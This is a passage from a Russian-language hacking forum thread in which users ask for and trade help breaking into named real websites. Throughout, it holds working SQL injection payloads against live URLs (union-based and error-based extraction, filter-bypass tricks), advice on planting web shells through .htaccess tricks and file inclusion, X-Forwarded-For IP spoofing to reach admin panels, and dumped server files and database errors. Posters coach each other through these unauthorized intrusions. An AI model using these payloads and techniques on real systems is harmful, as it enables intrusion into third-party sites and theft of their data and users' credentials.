http://gmsy.ru/games/lineage-ii-freek'+union+select+1,2,3,4,@@version,6,7,8,9+--+

скобки вроди бы фильтруются

http://gmsy.ru/games/lineage-ii-fre...+from+information_schema.tables+limit+0,1+--+ (http://gmsy.ru/games/lineage-ii-freek'+union+select+1,table_name,3,4,5,6,7,8,9+fro m+information_schema.tables+limit+0,1+--+)

SaNDER
12.09.2015, 16:33
На payonline.ru сканер нашёл это :


Code:
C:/Users/K9D71~1.MUR/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg

и что мне с этим делать?

и это


Code:
ppt/slides/_rels/slide8.xml

не могу построить ссылку .

http://payonline.ru/error/?aspxerrorpath=/'"-->netsparker(0x0004B4) (http://payonline.ru/error/?aspxerrorpath=/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker%280x0004B4%29%3C/scRipt%3E)

тут вообще интервал сервер еррор .

Нашёл crossdomain.xml


Code:


что это ? .

faza02
13.09.2015, 11:51
SaNDER said:
↑ (https://antichat.live/posts/3890475/)
На payonline.ru сканер нашёл это :

Code:
C:/Users/K9D71~1.MUR/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg

и что мне с этим делать?
и это

Code:
ppt/slides/_rels/slide8.xml

не могу построить ссылку .
http://payonline.ru/error/?aspxerrorpath=/'"-->netsparker(0x0004B4) (http://payonline.ru/error/?aspxerrorpath=/%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker%280x0004B4%29%3C/scRipt%3E)
тут вообще интервал сервер еррор .
Нашёл crossdomain.xml

Code:


что это ? .


/threads/300591/ (https://antichat.live/threads/300591/)

faza02
13.09.2015, 22:59
SaNDER said:
↑ (https://antichat.live/posts/3890730/)
там не указаны домены,а они нужны .


7 раз перечитайте тему, один раз напишите комментарий

Muracha
13.09.2015, 23:09
Мозг себе сломал ,а не скрипт. Есть ли уязвимость в двух скриптах или нет?

sqlmap говорит, что нет.

Всякие акинетиксы и вебкрайсеры говорят, что там чуть ли не слепая инъекция.

Приложить лог не могу. Не в txt формате.

Но говорит, что какие-то уязвимости есть, хотя тем же sqlmap я найти не могу.

Так ли это или нет?


Code:
http://www.mydreams.ru/banners.php?bid=2&op=click
http://www.mydreams.ru/usersearch.php?op=search&new=1&fm=1
http://www.mydreams.ru/usersearch.php?new=1&fm=1&op=99999999
http://www.mydreams.ru/usersearch.php?fromAge=3776996&name_mask=3234652&op=search&whom=0&country=57&search_method=1&toAge=99999999
http://www.mydreams.ru/pollresults.php?poll_id=18&filter=


Выяснил, что это XOOPS

но все равно непонятно, почему по одной и той же ссылке

http://www.mydreams.ru/usersearch.php?op=search&new=1&fm=1

Havij определяет это либо как уязвимость, а sqlmap не видит в упор

Muracha
14.09.2015, 20:17
Всего лишь нет какого-то там плагина, аплета.

Это cms


Code:
Community Forum Software by IP.Board 3.4.6

Уязвимости можно посмотретть на http://exploit-db.com

ghost8
16.09.2015, 02:50
SaNDER said:
↑ (https://antichat.live/posts/3891094/)

Code:
http://gmodtower.ru/index.php?app=core&inapp=&module=global&section=navigation

там внизу написано invalid app .
Здесь есть какая-нибудь уязвимость и если да,то какая подскажите пожалуйста .


Попробуй просмотреть module,попадалось такое на LFI(4096) если не ошибаюсь.

ghost8
16.09.2015, 02:52
SaNDER said:
↑ (https://antichat.live/posts/3890730/)
там не указаны домены,а они нужны .


Если нужны под домены ,то в гугле есть на питоне brute knock.py

DezMond™
16.09.2015, 16:26
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)

хелп

YaBtr
16.09.2015, 16:46
DezMond™ said:
↑ (https://antichat.live/posts/3891827/)
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
хелп


Что там не получается?

DezMond™
16.09.2015, 20:28
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or(ExtractValue(1,concat(0x3a,(sel ect(table_name)from(information_schema.tables))))) ='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)

как лимитами перебрать? (ошибка returns more than 1 row)

и есть ли таблица be_users (она должна быть) в других базах? не могу найти(

winstrool
16.09.2015, 22:59
как Remote File Inclusion (RFI) Идем читать статьи по PHP инклудам, в часто задаваемых вопросах, закрепленной ветки этого раздела - /threads/104591/ (https://antichat.live/threads/104591/)

Muracha
17.09.2015, 00:57
Ошибка при сканировании sqlmap


Code:
[23:52:55] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point

Запрос:


Code:
python sqlmap.py -u "http://www.doskaurala.ru/add.php?cats=3" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db

Я так понял из ошибки,что он не может разобрать что за БД используется.

Как тогда в этом случае подставлять запрос?

Br@!ns
17.09.2015, 11:23
DezMond™ said:
↑ (https://antichat.live/posts/3891827/)
http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)
хелп


http://www.die-medienanstalten.de/i...nsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or%28ExtractValue%281,concat%280x3 a,%28select%28group_concat%28table_name%29%29from% 28information_schema.tables%29%29%29%29%29='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)

zifus
17.09.2015, 19:36
Как открыть paswd.db и group.db

faza02
17.09.2015, 21:56
zifus said:
↑ (https://antichat.live/posts/3892177/)
Как открыть paswd.db и group.db


смотря от чего эти файлы.

BigBear
17.09.2015, 22:04
zifus said:
↑ (https://antichat.live/posts/3892177/)
Как открыть paswd.db и group.db


блокнотом, даже если содержимое не читается.

Посмотри первые 5-6 байт, там обычно светится сигнатура, по которой можно определить реальное приложение для работы с файлами.

zifus
17.09.2015, 22:07
Это с сервера

кусок с passwd а ниже идут юзеры

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

А открываю блокнотом еще и еироглефы какие то

читал что без /etc/shadow не открыть

DezMond™
17.09.2015, 23:15
Br@!ns said:
↑ (https://antichat.live/posts/3892054/)
http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or(ExtractValue(1,concat(0x3a,(sel ect(group_concat(table_name))from(information_sche ma.tables)))))='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or%28ExtractValue%281,concat%280x3 a,%28select%28group_concat%28table_name%29%29from% 28information_schema.tables%29%29%29%29%29='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and)


А limit как перебрать?

YaBtr
18.09.2015, 21:39
DezMond™ said:
↑ (https://antichat.live/posts/3892274/)
А limit как перебрать?


Если у Вас не получается использовать лимит, заверните group_concat в mid/substr/substring.

Sharingan
19.09.2015, 21:14
Здравствуйте, вот уже долго гляжу в поиске античата, но не могу найти более-менее понятных статей о поиске уязвимостей на серверах. т.е. что висит на портах например, где бывают дырки. т.е. есть сервер на который хотелось бы залить шелл, но сложно понять с какой стороны копать, есть Postfix на сервере, подключился по telnet helo выполняется а остальные - error. и то, helo через раз. Может кто подскажет годных статей для начинающих. На вебморде только Zimbra. Много видел статей по взлому именно web сайтов. А тут имеется лишь форма логина и остальное сопутное на сервере на разных портах.

winstrool
19.09.2015, 22:01
DezMond™ said:
↑ (https://antichat.live/posts/3892274/)
А limit как перебрать?


Вот пожалуйста, перебирайте:


http://www.die-medienanstalten.de/i...sPersonSearch=a'or(ExtractValue(1,concat(0x3a (http://www.die-medienanstalten.de/index.php?search=&id=78&sFullTextSearch=&sPersonSearch=a'or(ExtractValue(1,concat(0x3a)
,
(select/*!12345*/table_name/*!12345*/from/*!12345*/information_schema.tables/*!12345*/limit/*!12345*/1,1)
)))='1&iSIG=3&iSponsor=14&iFromYear=all&iToYear=all&sBoolOp=and

Timmkoy
19.09.2015, 22:15
Есть одна долгая TimeBased sql injection, что с ней можно сделать?

Как слить базу?

ButilkaSoka
20.09.2015, 05:19
Есть проблема с WAF


Code:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

Пробовал обходить, но не всеми способами.

А тут вообще без понятие что делать, не сталкивался с таким


Code:
http://frostland.pro/shop/search

POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00

хелп

Га-Ноцри
20.09.2015, 06:33
По первому линку, как вариант, добиваться вывода не через конструкцию union select, а через XPATH

C пробелами:


Code:
http://www.spbpost.ru/index.php?page_id=305 and extractvalue rand(),concat(0x3a,version(),0x3a,user()))--

Аналог без пробелов:


Code:
http://www.spbpost.ru/index.php?page_id=305*updatexml(0,lpad(user(),22,0 x3A),1)#

Br@!ns
20.09.2015, 12:31
ButilkaSoka said:
↑ (https://antichat.live/posts/3893016/)
Есть проблема с WAF

Code:
http://www.spbpost.ru/index.php?page_id=305+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

Пробовал обходить, но не всеми способами.
А тут вообще без понятие что делать, не сталкивался с таким

Code:
http://frostland.pro/shop/search

POST:
search=%cd%e0%e9%f2%e8&searchword=1'%00

хелп


во втором случае так же через Error-based вектор:

POST

searchword=asf'or(ExtractValue(1,concat(0x3a,(sele ct(version())))))='1%00&search=%CD%E0%E9%F2%E8'

XPATH syntax error: ':10.0.11-MariaDB'

XPATH syntax error: ':frostla_main@37.187.136.213'

PS в следующий раз, если скуля в месте где нужно быть авторизованым, выкладывайте тестовый акк

ynk
21.09.2015, 19:24
index.php?p=cvv&CONTRY=&STATE=&City=&TYPE=&BASE=12.08.2015+MIX&BIN=&sub=Apply+filter

что можно сделать?

ButilkaSoka
21.09.2015, 20:14
хелп

Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?

winstrool
21.09.2015, 20:28
ButilkaSoka said:
↑ (https://antichat.live/posts/3893550/)
хелп
Есть данные админки, не пускает, походу пускает через ip, но они тоже есть(ip), возможно ли их подставить, если да, то как?


Если идет обработка IP по заголовку X-Forwarded-For "$_SERVER['HTTP_X_FORWARDED_FOR'];" то можно сделать подмену IP в заголовках хидера

Полезно почитать для понимания:

http://php.net/manual/ru/reserved.variables.php#79359

http://phpfaq.ru/ip

Unknowhacker
22.09.2015, 12:35
Столкнулся с проблемой загрузки шелла. Итак, перехватил данные куки - залогился , но когда нажимаю править новость в надежде загрузить шелл, то выскакивает окно Basic Authorization


Code:
http://timer-odessa.net

Log:


Code:
Array
(
[admin] => file
[do] => upload
[ID] =>
[MaterialName] => новая запись
[UrlAlias] =>
[ajax] => 1
[qqfile] => 2.jpg
[tinymcePasteText] => 1
[__cfduid] => d324f6c51adb790a7d0cce7ebea72e8291425213546
[__utma] => 31476155.825643414.1425214893.1442902126.144290859 5.874
[__utmb] => 31476155.3.10.1442908595
[__utmc] => 31476155
[__utmz] => 31476155.1441743778.772.137.utmcsr=facebook.com|ut mccn=(referral)|utmcmd=referral|utmcct=/
[_ym_visorc_15944878] => w
[PHPSESSID] => 2defc90036f0f83fb04646af0e2ab3dc
)


P.S Уже в учётке менял пароль, все равно это окно выскакивает!

winstrool
22.09.2015, 12:41
Видимо когда вы оброщаитесь к редактированию, подгружаются модули из папки которая защищена бейсик авторизацией, в перехваченных куках у вас нет куков под бейсик авторизацию.... возможно в вашей админки вам попадется локальный инклуд, где вы сможете найти файлик с паролем от бейсик авторизации...

Unknowhacker
22.09.2015, 14:25
Всё, что мне удалось найти..


Code:
http://timer-odessa.net/1/
http://timer-odessa.net/0tg
http://timer-odessa.net/uploads/

Сначала думал что шелл, но нет..


Code:
http://www.timer-odessa.net/uploads/userpix/m.php

Br@!ns
22.09.2015, 16:20
Unknowhacker said:
↑ (https://antichat.live/posts/3893797/)
Всё, что мне удалось найти..

Code:
http://timer-odessa.net/1/
http://timer-odessa.net/0tg
http://timer-odessa.net/uploads/

Сначала думал что шелл, но нет..

Code:
http://www.timer-odessa.net/uploads/userpix/m.php



мб пригодится

http://timer-odessa.net/bak/

Br@!ns
22.09.2015, 20:02
http://www.mariin.ru/index.php?p=fo...*/limit/**/0,1),+1,+63),+FLOOR(RAND(0)*2)))/* (http://www.mariin.ru/index.php?p=forum&action=getfile'OR/**/(SELECT+COUNT(*)/**/FROM/**/(SELECT+1/**/UNION/**/SELECT+2/**/UNION/**/SELECT+3)x/**/GROUP/**/BY/**/CONCAT(MID((select/**/'123'/**/from/**/koobi_user/**/limit/**/0,1),+1,+63),+FLOOR(RAND(0)*2)))/*)

Помогите префикс узнать у этой таблицы

__MVD
23.09.2015, 16:11
всем привет. дошел до непонимания: есть SQL уязвимость, есть логин и пасс админа, однако доступ к админке спрятан за "403 Forbidden", а пользователь БД с правами "USAGE". подскажите, в какую сторону копать дальше, или это тупик?

kingbeef
23.09.2015, 21:59
__MVD said:
↑ (https://antichat.live/posts/3894208/)
всем привет. дошел до непонимания: есть SQL уязвимость, есть логин и пасс админа, однако доступ к админке спрятан за "403 Forbidden", а пользователь БД с правами "USAGE". подскажите, в какую сторону копать дальше, или это тупик?


Как вариант найти прокси из подсети админа и зайти в админку.

rct
24.09.2015, 17:03
Народ, посоветуйте чего-нибудь. Есть скуля, есть уже прямой доступ к бд


Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 10990
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2015, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [stg]> \q


Есть current user is DBA: True

Не могу никуда записать шелл, везде права порезаны. Хотя известно расположение пхп-скриптов /var/www/site.com/ не получается прочитать конфиги, недостаточно прав. Хотя через load_file могу /etc/passwd. Мучаюсь долго, бросить жалко.

SaNDER
24.09.2015, 18:22
https://sgo.egov66.ru/asp/error.asp?DEST=&ET='LoginType'+param+not+found&AT= (https://sgo.egov66.ru/asp/error.asp?DEST=&ET=%27LoginType%27+param+not+found&AT=)

вот чувствую тут что то есть ... есть идеи?

ButilkaSoka
24.09.2015, 21:28
Хелп


Code:
http://www.site.com/view=sitemap&id='

Вывод Can not get the Viewsetи ошибка

Как двигаться дальше через ошибки вида ?


Code:
/page.php
site.com/page/

Например :


Code:
http://kasko-center.by/kasko.courses.php

Brut Star
24.09.2015, 21:57
Всем доброго времени суток,нужна помощь,сканируя сайт прога говорт что нашла два места Кросс Сайт атак выполнила их.У меня появился вывод куки такого плана (Set-Cookie: sid=5fc1e3d79a42ca4481e989f2a1f77498; path=/; domain=мой сайт.ru) Что с этим можно сделать подскажите пожалуйста.

Brut Star
24.09.2015, 22:03
И еще такая штука (Remote OS Command injection) (Set-Cookie: sid=72b173c6d50979ff43eecb51535a4f3e; path=/; domain=мой сайт.ru) Подскажите новичку в таком деле.

Brut Star
24.09.2015, 22:14
ButilkaSoka said:
↑ (https://antichat.live/posts/3894664/)
Хелп

Code:
http://www.site.com/view=sitemap&id='or(ExtractValue(1,concat(0x3a,(version()))))='

Вывод
Can not get the Viewset
и ошибка
Как двигаться дальше через ошибки вида ?

Code:
/page.php
site.com/page/

Например :

Code:
http://kasko-center.by/kasko.courses.php



Мне тоже интересно

Brut Star
24.09.2015, 22:16
rct said:
↑ (https://antichat.live/posts/3894581/)
Народ, посоветуйте чего-нибудь. Есть скуля, есть уже прямой доступ к бд
Есть current user is DBA: True
Не могу никуда записать шелл, везде права порезаны. Хотя известно расположение пхп-скриптов /var/www/site.com/ не получается прочитать конфиги, недостаточно прав. Хотя через load_file могу /etc/passwd. Мучаюсь долго, бросить жалко.


Таки попробуй подсунуть что то типа txt,может проканает.Бекдор подсунь и попробуй покопаться.

faza02
24.09.2015, 23:11
Timmkoy said:
↑ (https://antichat.live/posts/3892961/)
Есть одна долгая TimeBased sql injection, что с ней можно сделать?
Как слить базу?


добиться получения веб-шелла и затем слить всю бд.


SaNDER said:
↑ (https://antichat.live/posts/3893109/)
Вообщем нашёл CRFL Injection/HTML Respone splitting .

Code:
This vulnerability affects /.
Discovered by: Scripting (Error_Message.script).
Attack details
URL encoded POST input group was set to 12345'"\'\");|]*{%0d%0a%bf%27'
Error message found:
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 5 in /var/www/u0085722/public_html/icewynd.ru/function.php on line 166


Как заюзать? .


вы что-то странное скинули, отправьте нормальный ответ и запрос сюда.


rct said:
↑ (https://antichat.live/posts/3894581/)
Народ, посоветуйте чего-нибудь. Есть скуля, есть уже прямой доступ к бд
Есть current user is DBA: True
Не могу никуда записать шелл, везде права порезаны. Хотя известно расположение пхп-скриптов /var/www/site.com/ не получается прочитать конфиги, недостаточно прав. Хотя через load_file могу /etc/passwd. Мучаюсь долго, бросить жалко.


ищите папки доступные на запись через реверс IP, перебором директорий, если FreeBSD читайте папки


Brut Star said:
↑ (https://antichat.live/posts/3894676/)
Всем доброго времени суток,нужна помощь,сканируя сайт прога говорт что нашла два места Кросс Сайт атак выполнила их.У меня появился вывод куки такого плана (Set-Cookie: sid=5fc1e3d79a42ca4481e989f2a1f77498; path=/; domain=мой сайт.ru) Что с этим можно сделать подскажите пожалуйста.




Brut Star said:
↑ (https://antichat.live/posts/3894680/)
И еще такая штука (Remote OS Command injection) (Set-Cookie: sid=72b173c6d50979ff43eecb51535a4f3e; path=/; domain=мой сайт.ru) Подскажите новичку в таком деле.


читайте про XSS и RCE.

rct
25.09.2015, 00:31
yarbabin said:
↑ (https://antichat.live/posts/3894706/)
ищите папки доступные на запись через реверс IP, перебором директорий, если FreeBSD читайте папки


Могу записать в /tmp, но как заинклудить? Где-то читал про модули для mysql, но потерял ссылку. Не напомните как эта атака называется? Да, ОС там убунта 14.04.1 LTS без апдейтов.

faza02
25.09.2015, 10:26
rct said:
↑ (https://antichat.live/posts/3894745/)
Могу записать в /tmp, но как заинклудить? Где-то читал про модули для mysql, но потерял ссылку. Не напомните как эта атака называется? Да, ОС там убунта 14.04.1 LTS без апдейтов.


заинклудить, найдя инклуд

rct
25.09.2015, 10:56
yarbabin said:
↑ (https://antichat.live/posts/3894844/)
заинклудить, найдя инклуд


Хех А можно заинклудить пхп который вне /var/www/site.com/ ? Это, наверное, последний вариант, т.к. mysqludf.so только от рута можно закинуть в /lib/mysql.

stas1kus
25.09.2015, 16:04
Hi,

Возник вопрос, при загрузке файла с разными манёврами я смог загрузить битый файл, найти этот файл, открыть, и увидеть вот такой вот калл (ниже). Пробовал менять мета-дату для файла с разными эксплоитами, но пока что ничего не смог найти чтоб я смог сделать интересного с помощью данного файла (алгоритма).

Порекомендуйте на что можно еще проверить \ или что можно интересного послать через данный файл. Web-server nginx

PS. сорри, с работы не могу открыть ничего с редактора, в том числе и для того чтоб вставить картинку.. поэтому просто кину линку на картинку... http://i.imgsafe.org/1f96ad5.png

спс

ocheretko
25.09.2015, 16:09
Попробуйте загрузить файл .htaccess и в нем переопределить расширение картинки на исполнение пхп сценария

AddType application/x-httpd-php .jpg

AddHandler application/x-httpd-php .jpg

stas1kus
25.09.2015, 16:46
эм, сорри за такой вопрос, т.е. я .htaccess файл с таким контентом просто заливаю и потом открываю какой-то файл!? ну и ладно, внесу еще 1 поправку, такой выхлоп я получил из-за того, что удалил расширение у файла... поэтому возможно не совсем подойдет ваш подход? исправте если не так понял. спс

Konqi
25.09.2015, 19:09
SaNDER said:
↑ (https://antichat.live/posts/3895011/)
Как SQL подставить к COOKIE ?
Посоветуйте более современные методы для Mozilla FireFox(40-41 версия ) .
Как-нибудь вот так
Cookie: _vis_opt_s='+or+1%3D1+--+
что-ли .


не очень удобно раскручивать скулю в куках через браузер. поставь burp suite, или charles.

а так можно через Live http headers для ФФ

Konqi
25.09.2015, 20:18
SaNDER said:
↑ (https://antichat.live/posts/3895057/)
А через Charles как это сделать?


ну перехвати один из запросов, потом повторно отправляй его меняя куки


И ещё на сайте blabla.com/?lang='
Вылезает такое чудо
Warning
: include(language/'.php): failed to open stream: No such file or directory in
/home/vasil78/blabla.com/libs/core.php
on line
34
Предполагаю что это File Inclusion . Как заинклудить ? .


попробуй нулл-байтом отрезать .php, или же юзать багу со слеш-дотами. ничего нового.

profishell
26.09.2015, 03:49
SaNDER said:
↑ (https://antichat.live/posts/3895190/)
Мне помог один парень . blabla.com/lang=kkkk../../index Отображается сайт c какими то ошибками .
Нужно обрезать .php,нулл-байт не решает .
А что за бага со слэш-дотами? я не понял .
http://storeshop.hol.es/gpay?note=bill
' вот тут я юнионы,group юзал не помогает,как раскрутить ?


Про слеши - https://rdot.org/forum/archive/index.php/t-2611.html

А по скуле... Че тут крутить?

http://storeshop.hol.es/gpay?note=b... 1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- ' (http://storeshop.hol.es/gpay?note=bill[WFOi6uhZ60cwJs8]%27%20and%205=1%20union%20select%201,2,3,4,5,6,7,v ersion(),9,10,11,12,13,14--%20%27)

faza02
26.09.2015, 14:28
SaNDER said:
↑ (https://antichat.live/posts/3895336/)
странно но не скульмапом,не хэвиджом не инжектит . Хэвидж говорит про 403 Forbbiden,скульмап практически про тоже .

Code:
starting at: 12:52:27

[12:52:54] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[12:53:04] [WARNING] GET parameter 'note' is not injectable
[12:53:04] [CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~75.91% of page content is text)
[12:53:04] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 140 times

shutting down at: 12:53:04



пробуйте добавлять параметры типа юзер-агентов, кук, делать меньше delay и т. д.

Br@!ns
26.09.2015, 16:01
SaNDER said:
↑ (https://antichat.live/posts/3895368/)
Я либо не правильно составляю команды,либо фигня какая-то .
Может кто выручит,другие способы есть?
(Посты за собой удалю т.к мешают .)


http://storeshop.hol.es/admin

http://storeshop.hol.es/gpay?note=b...10,password,12,13,14+from+users+limi t+0,1+--+ (http://storeshop.hol.es/gpay?note=bill[WFOi6uhZ60cwJs8]'and+1=2+union%20select+1,email,3,4,5,6,7,version( ),9,10,password,12,13,14+from+users+limit+0,1+--+)'

пароль не выкладываю, т.к нельзя. Есть на cmd5.

Вам и так все расжували уже, пробуйте ручками все делать, а не хевиджем со скулмапом.

ButilkaSoka
27.09.2015, 20:53
Хелп.

Нужна помощь в раскрутке.


Code:
http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27

http://dota2.name/request/edit/?act=skype&id=\
POST
name=skype&pk=1&value=e

Как двигаться дальше через ошибки вида:


Code:
/page.php
site.com/page/

Например:


Code:
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/

Есть ли тут sqli?


Code:
http://steam-store.ru/pay
POST
price=3

Br@!ns
28.09.2015, 12:41
ButilkaSoka said:
↑ (https://antichat.live/posts/3895771/)
Хелп.
Нужна помощь в раскрутке.

Code:
http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27

http://dota2.name/request/edit/?act=skype&id=\
POST
name=skype&pk=1&value=e

Как двигаться дальше через ошибки вида:

Code:
/page.php
site.com/page/

Например:

Code:
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/

Есть ли тут sqli?

Code:
http://steam-store.ru/pay
POST
price=3




http://rghost.net/8YCQ8PqhC/image.png

http://kasko-center.by/kasko.courses.php

http://www.24tv.by/24old/

Просто ошибки сайта (раскрытие путей), ничего не делать, искать другие уязвимости.

3ran
28.09.2015, 18:40
SaNDER said:
↑ (https://antichat.live/posts/3895965/)
Взломав домен хостинга,можно ли взломать и сам хостинг?А после и сайты на котором стоят хостинги,тоже можно взломать ? .

домен.хостинг.ру

вытащил из него phpinfo .

а как юзать не знаю .

Узнал версию phpMyAdmin 4.4.14

Узнал версиюPHP Version 5.4.45

Server API Apache 2.0 Handler
OC Linux
apache2handler

Apache Version Apache/2.2.22 (@Release (https://antichat.live/members/44554/)@)

APCu Support Enabled

SERVER_ADDR

ну там дофига чего я лишь часть показал что ещё нужно и как это юзать?
Version 4.0.7


Работает

домен.хостинг.ру/phpMyAdmin/doc/html/search.html

Открытые порты

Spoiler

3306

1500

995

993

465

443

143

110

80

81

53/tcp и /udp

25

22

21

_ttp:moe-porno.com/acux7707%C0%BEz1%C0%BCz2a%90bcxuca7707 HTTP/1.1
Осторожно,порнуха=) .
При переходе по линке вылезает это

Code:
warning: htmlspecialchars(): Invalid multibyte sequence in argument in /home/moe-porno/data/www/moe-porno.com/includes/bootstrap.inc on line 860.

Сканил Acunetix 10-ым .
Что это SQL?File Inclusion ?
_ttp://moe-porno.com/search?searchid=2137557&text[]=&web=0 тоже самое .


Лол

Нашел phpinfo и решил взломать хостинг,фантазер однако

3ran
28.09.2015, 19:44
SaNDER said:
↑ (https://antichat.live/posts/3896161/)
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
К сведению там не токо PHPinfo
. Всё же начинается по-малому,да и хостинг не золото .
Лучше помоги там где ссылка по-ниже . . Я с такой хернёй впервые сталкиваюсь .


Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.

Но это тебе не особо поможет.

ocheretko
28.09.2015, 19:55
SaNDER said:
↑ (https://antichat.live/posts/3896161/)
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
Лучше помоги там где ссылка по-ниже . . Я с такой хернёй впервые сталкиваюсь .


Invalid multibyte

говорит о том, что данные получены не в UTF-8, как ожидала функция, а хз в какой. Этот прием полезен чтобы получить раскрытие путей, что у Вас и получилось


3ran said:
↑ (https://antichat.live/posts/3896171/)
Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.
Но это тебе не особо поможет.


Если идти последовательно, то сперва всегда идет сбор данных, а после проверка гипотез

RedFern.89
29.09.2015, 14:06
Code:
http://www.game-debate.com/benchmark/bm_datatable.php?bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=true&bSortable_1=true&bSortable_10=true&bSortable_11=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=12&iDisplayLength=1%27%22&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=rbt_tool&mDataProp_1=rb_bench&mDataProp_10=m_graf&mDataProp_11=rbt_test&mDataProp_2=m_cpu_deriv&mDataProp_3=m_graf_deriv&mDataProp_4=rbt_types&mDataProp_5=m_username&mDataProp_6=rb_date&mDataProp_7=rb_id&mDataProp_8=m_id&mDataProp_9=m_cpu&sColumns=&sEcho=3&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=asc&_=1443468868286

Возможно ли раскрутить?

cheebeez
30.09.2015, 18:41
[DEL 32]

t0ma5
30.09.2015, 20:24
SaNDER said:
↑ (https://antichat.live/posts/3896907/)
_ttp://steamplay.ru/confirm_buying

в /confirm_buying находится скуль инжект(правда,сканер не врёт) .

Через Post посылаю id_goods=1'",выводит обратно на главную страницу .

Тогда как сканер туда попал ? . И как мне туда попасть? .


куки куки, сессию подключения вероятно нужно передавать


Через Post посылаю id_goods=1





юзай curl, в firefox(firebug) к тому же можно скопировать запрос в формате curl

ButilkaSoka
30.09.2015, 23:43
SaNDER said:
↑ (https://antichat.live/posts/3896997/)
POST /confirm_buying HTTP/1.1 Content-Length: 353 Content-Type: application/x-www-form-urlencoded Referer:
http://steamplay.ru:80/
А вот то что сканер видит :

Code:
A Database Error Occurred
Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1

UPDATE `items` SET `views` = `views` + 1 WHERE `digiseller_id` = '1'"'

Filename: /home/s/steampxb/steampxb.bget.ru/public_html/helpers/top10_helper.php
Line Number: 30

Но вот,что странно
Response показывает это :

Code:
